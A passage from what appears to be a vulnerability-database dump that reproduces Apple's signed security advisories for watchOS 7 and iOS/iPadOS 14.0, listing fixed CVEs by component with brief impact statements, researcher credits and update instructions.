CVE-2020-9981: found by OSS-Fuzz
Entry added November 12, 2020
Mail
Available for: Apple Watch Series 3 and later
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
CVE-2020-9941: Fabian Ising of FH Münster University of Applied
Sciences and Damian Poddebniak of FH Münster University of Applied
Sciences
Entry added November 12, 2020
Messages
Available for: Apple Watch Series 3 and later
Impact: A local user may be able to discover a user’s deleted
messages
Description: The issue was addressed with improved deletion.
CVE-2020-9989: von Brunn Media
Entry added November 12, 2020
Phone
Available for: Apple Watch Series 3 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Safari
Available for: Apple Watch Series 3 and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: The issue was addressed with improved UI handling.
CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba,
Piotr Duszynski
Entry added November 12, 2020
Sandbox
Available for: Apple Watch Series 3 and later
Impact: A local user may be able to view senstive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)
Entry added November 12, 2020
Sandbox
Available for: Apple Watch Series 3 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester (@_xpn_) of TrustedSec
Entry updated September 17, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
Entry added November 12, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: A remote attacker may be able to leak memory
Description: An information disclosure issue was addressed with
improved state management.
CVE-2020-9849
Entry added November 12, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-13631
Entry added November 12, 2020
SQLite
Available for: Apple Watch Series 3 and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-9947: cc working with Trend Micro Zero Day Initiative
CVE-2020-9950: cc working with Trend Micro Zero Day Initiative
CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos
Entry added November 12, 2020
WebKit
Available for: Apple Watch Series 3 and later
Impact: Processing maliciously crafted web content may lead to code
execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9983: zhunki
Entry added November 12, 2020
WebKit
Available for: Apple Watch Series 3 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Additional recognition
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab for their assistance.
Entry added November 12, 2020
Bluetooth
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Entry added November 12, 2020
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
Entry added November 12, 2020
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero,
Stephen Röttger of Google for their assistance.
Entry updated November 12, 2020
Location Framework
We would like to acknowledge Nicolas Brunner
(linkedin.com/in/nicolas-brunner-651bb4128) for their assistance.
Entry updated October 19, 2020
Mail Drafts
We would like to acknowledge Jon Bottarini of HackerOne for their
assistance.
Entry added November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added October 19, 2020, updated November 12, 2020
WebKit
We would like to acknowledge Pawel Wylecial of REDTEAM.PL, Ryan
Pickren (ryanpickren.com) for their assistance.
Entry added November 12, 2020
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About".
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxnUACgkQZcsbuWJ6
jjBSNA/9Fo7IsnnHAT7UAmepT0esn2tFafOZC9aupUH+KLAnslIqkhLibj8KdZ2z
jtpOn8IzYKrFXQOxm9x+QGjzmxNhBQE2fNQRiATIaOdpkgOz7j6yqIRSUqA2aN0y
QmaDwPzYEtEHKRF0Tk4cj8N8dGM3mgQTvS2YcTASFme/9jkbVX77F+CbbaxJUMHd
7fxUrMev+kTDx7kmG9aiec1+pfiV2JZUuv0a1IN7+VxbAHhVKHE2hDHNNPPLlG0Z
50sqhO/1vaRf6Ewe+A+xGi/Z31P81hhozyBZEcr8WDD7RBUA9QYyq7Duor6ZRUQ/
sUlTWctb+jPzyFePmYKEr7RIE1JSnANHHKMmLfTwLOaHqH5TMtcP6k6QRRVPjKBb
zeWg6Xheaz+5h6ymX5woYNbzGN9TaAysz2KeFO3mK9XjPaUbzEAJT9+IryHYSLnT
P3TgQw3g/HPVpWyp+s3fjcmpi9jGyxjdFezuMekeO4VktlgdK1lBs0gELPA0Zrkh
MRl1ztd4FbMMAKHAzIgIcUUg5kgMMC6hO/DCVMlHCctHoNQeh2rEQo15YRRCEfAo
OgDJsznRtf3hYsZC7Q19D8q0E/SeMtYrRdzjeSNvSQffyiNf3hvUcbxVYQMqm3Vw
/tzliqnfshdjfpxB6sS4oDrnEqrM/x+2oETEgzHXWa9nt1rrLBI=
=8ihy
-----END PGP SIGNATURE-----
| VAR-202010-1513 | CVE-2020-9958 | iOS and iPadOS Out-of-bounds write vulnerability in |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-3 Additional information for
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 addresses the following issues. Information
about the security content is also available at
https://support.apple.com/HT211850.
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of LightYear Security Lab of AntGroup
Entry updated November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreAudio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Playing a malicious audio file may lead to arbitrary code
execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreCapture
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9949: Proteas
Entry added November 12, 2020
Disk Images
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9965: Proteas
CVE-2020-9966: Proteas
Entry added November 12, 2020
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen of Zimperium
zLabs
Entry updated September 17, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9961: Xingwei Lin of Ant Security Light-Year Lab
Entry added November 12, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9876: Mickey Jin of Trend Micro
Entry added November 12, 2020
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Kernel
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
inject into active connections within a VPN tunnel
Description: A routing issue was addressed with improved
restrictions.
CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R.
Crandall
Entry added November 12, 2020
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
libxml2
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted file may lead to arbitrary
code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9981: found by OSS-Fuzz
Entry added November 12, 2020
Mail
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
CVE-2020-9941: Fabian Ising of FH Münster University of Applied
Sciences and Damian Poddebniak of FH Münster University of Applied
Sciences
Entry added November 12, 2020
Messages
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to discover a user’s deleted
messages
Description: The issue was addressed with improved deletion.
CVE-2020-9988: William Breuer of the Netherlands
CVE-2020-9989: von Brunn Media
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-13520: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-6147: Aleksandar Nikolic of Cisco Talos
CVE-2020-9972: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
NetworkExtension
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to elevate privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and
Mickey Jin of Trend Micro
Entry added November 12, 2020
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Quick Look
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious app may be able to determine the existence of
files on the computer
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to determine a user's
open tabs in Safari
Description: A validation issue existed in the entitlement
verification.
CVE-2020-9977: Josh Parnham (@joshparnham)
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: The issue was addressed with improved UI handling.
CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba,
Piotr Duszynski
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to view senstive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester (@_xpn_) of TrustedSec
Entry updated September 17, 2020
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to leak memory
Description: An information disclosure issue was addressed with
improved state management.
CVE-2020-9849
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-13631
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-13630
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9947: cc working with Trend Micro Zero Day Initiative
CVE-2020-9950: cc working with Trend Micro Zero Day Initiative
CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to code
execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9983: zhunki
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Wi-Fi
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A logic issue was addressed with improved state
management.
CVE-2020-10013: Yu Wang of Didi Research America
Entry added November 12, 2020
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab for their assistance.
Entry added November 12, 2020
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Entry added November 12, 2020
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero,
Stephen Röttger of Google for their assistance.
Entry updated November 12, 2020
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
lldb
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
Entry added November 12, 2020
Location Framework
We would like to acknowledge Nicolas Brunner
(linkedin.com/in/nicolas-brunner-651bb4128) for their assistance.
Entry updated October 19, 2020
Mail
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added November 12, 2020
Mail Drafts
We would like to acknowledge Jon Bottarini of HackerOne for their
assistance.
Entry added November 12, 2020
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge Hasan Fahrettin Kaya of Akdeniz
University, an anonymous researcher for their assistance.
Entry updated November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added November 12, 2020
Safari Reader
We would like to acknowledge Zhiyang Zeng(@Wester) of OPPO ZIWU
Security Lab for their assistance.
Entry added November 12, 2020
Security
We would like to acknowledge Christian Starkjohann of Objective
Development Software GmbH for their assistance.
Entry added November 12, 2020
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Onur Can Bıkmaz, Vodafone Turkey
@canbkmaz, Yiğit Can YILMAZ (@yilmazcanyigit), an anonymous
researcher for their assistance.
Entry updated November 12, 2020
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
WebKit
We would like to acknowledge Pawel Wylecial of REDTEAM.PL, Ryan
Pickren (ryanpickren.com), Tsubasa FUJII (@reinforchu), Zhiyang
Zeng(@Wester) of OPPO ZIWU Security Lab for their assistance.
Entry added November 12, 2020
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxqgACgkQZcsbuWJ6
jjBhIhAAhLzDSjgjVzG0JLzEerhFBcAWQ1G8ogmIdxuC0aQfvxO4V1NriKzUcmsZ
UgQCEdN4kzfLsj3KeuwSeq0pg2CX1eZdgY/FyuOBRzljsmGPXJgkyYapJww6mC8n
7jeJazKusiyaRmScLYDwvbOQGlaqCfu6HrM9umMpLfwPGjFqe/gz8jyxohdVZx9t
pNC0g9l37dVJIvFRc1mAm9HAnIQoL8CDOEd96jVYiecB8xk0X6CwjZ7nGzYJc5LZ
A54EaN0dDz+8q8jgylmAd8xkA8Pgdsxw+LWDr1TxPuu3XIzYa98S1AsItK2eiWx8
pIhrzVZ3fk1w3+W/cSWrgzUq4ouijWcWw9dmVgxmzv9ldL/pS+wIgFsYLJm4xHAp
PH+9p3JmMQks9BWgr3h+NEcJwCUm5J7y0PNuCnQL2iKzn4jikqgfCXHZOidkPV3t
KjeeIFX30AGI7cUqhRl9GbRn8l5SA4pbd4a0Y5df1PgkDjSXxw91Z1+5S15Qfrzs
K8pBlPH37yU3aqMEvxBsN5Fd7vdFdA+pV/aWG5tw4pUlZJC25c50w1ZW0vrnsisg
/isPJqXhUWiGAfQ7s5W6W3AMs4PyvRjY+7zzGiHAd+wNkUNwVTbXvKP4W4n/vGH8
uARpQRQsureymLerXpVTwH8ZoeDEeZZwaqNHTQKg/M9ifAZPZUA=
=WdqR
-----END PGP SIGNATURE-----
| VAR-202010-1519 | CVE-2020-9976 | plural Apple Vulnerabilities that disclose information in products |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 are now available and address the following:
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of Ant-Financial LightYear Labs
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester(@xpn) of TrustedSec
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
Location Framework
We would like to acknowledge an anonymous researcher for their
assistance.
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge an anonymous researcher for their
assistance.
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
